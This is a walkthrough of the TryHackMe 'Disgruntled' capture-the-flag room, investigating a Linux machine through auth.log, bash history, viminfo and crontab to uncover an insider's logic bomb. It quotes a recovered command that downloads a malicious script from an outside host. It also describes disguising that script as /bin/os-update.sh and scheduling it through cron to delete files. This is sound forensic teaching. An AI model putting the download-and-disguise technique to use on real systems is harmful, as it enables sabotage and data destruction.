Disgruntled CTF Walkthrough

This is a great CTF on TryHackMe that can be accessed through this link here: https://tryhackme.com/room/disgruntled

Here’s a little backstory first:

“Not sure if you’ve seen the news, but an employee from the IT department of one of our clients (CyberT) got arrested by the police. The guy was running a successful phishing operation as a side gig.

CyberT wants us to check if this person has done anything malicious to any of their assets. Get set up, grab a cup of coffee, and meet me in the conference room.”

Seems like something that commonly happens to businesses when an employee is disgruntled after being fired, denied promotion, or just simply unhappy in the workplace. Let’s take a look at the Machine that the disgruntled employee last worked on.

Our first task is:

1. The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

• The first thing we will do is to check the sudo execution history by looking at the auth.log found in the /var/log file path.

cd /var/log

cat auth.log | grep install

Checking auth.log for the installed package using elevated priviledges.

• There we have the answer to the first CTF question: The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

/usr/bin/apt install dokuwiki 

• The second CTF question is also found in the same auth.log file:
  What was the present working directory (PWD) when the previous command was run?

/home/cybert

For the next task we are to find what user was created after the package was installed.

2. Which user was created after the package from the previous task was installed?

• We can solve this one easily by looking into the same auth.log file and using the following input to get the flag/answer:

cat auth.log | grep adduser

Looking at the auth.log file to find the user created by the disgruntled employee.

• After running that input we see that the user created by the disgruntled employee is: it-admin.

3. A user was then later given sudo privileges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)

Dec 28 06:27:34

4. A script file was opened using the “vi” text editor. What is the name of this file?

bomb.sh

To get these answers I looked at the auth.log file in its entirety and looked for it-admin getting sudo privileges and also found the answer to the following question about the script file opened using the “vi” editor. Screenshot below. This was done by simple input:

cat auth.log

it-admin getting sudo privileges and the script opened using “vi”.

So we found the “bomb” left behind by the employee. Here is the next set of CTF questions to solve.

5. What is the command used that created the file bomb.sh?

Solution: The command was used using the ‘it-admin” account. Our best bet is to look into the .bash_history file that is under that users home directory.

Looking into the .bash_history file under it-admin. We can see the command used to create the bomb.sh file.

Answer:

curl 10.10.158.38:8080/bomb.sh --output bomb.sh

6. The file was renamed and moved to a different directory. What is the full path of this file now?

Solution: Looking at the screenshot above, we can also see the .viminfo file. We can look into this and see the vi history.

Looking into the .viminfo file to see the vi history and determin the renamed file and where it was moved to.

Answer:

/bin/os-update.sh

7. When was the file from the previous question last modified? (Format: Month Day HH:MM)

Solution: We now know the new file name and location. We can head there and investigate when the file was last modified.

Investigating the new file location and investigating the file to see when it was last modified.

Answer:

Dec 28 06:29

8. What is the name of the file that will get created when the file from the first question executes?

Solution: To solve this, we are going to open the file using nano and will investigate the code to see what will be created.

Opening the file using nano and investigating the code and we see the file created: goodbye.txt

Answer:

goodbye.txt

So we finally have a file and we have the motive for the disgruntled employee. Let’s find out when this malicious file will trigger.

9. At what time will the malicious file trigger? (Format: HH:MM AM/PM)

Solution: We will look at the crontab to figure out when the malicious file will trigger.

crontab file being investigated to see when the malicious file will trigger/execute.

Answer:

08:00 AM

We did it! What did we find out?

We learned that the disgruntled employee downloaded a script that was already prepared previously and that it will delete all files of the installed service if the user has not logged in to this machine in the last 30 days. A perfect example of a “Logic bomb”.

I think there’s a alot to learn in this CTF about investigating a machine. Linux fundamentals are very useful in this CTF. Instead of searching endlessly in the logs such as the auth.log you can make use for grep. For example “ cat auth.log | grep install ” or “ cat auth.log | grep adduser ” really narrowed down the output to find the answers or flags we needed.

Thanks for reading/following along!

Gh0$ttt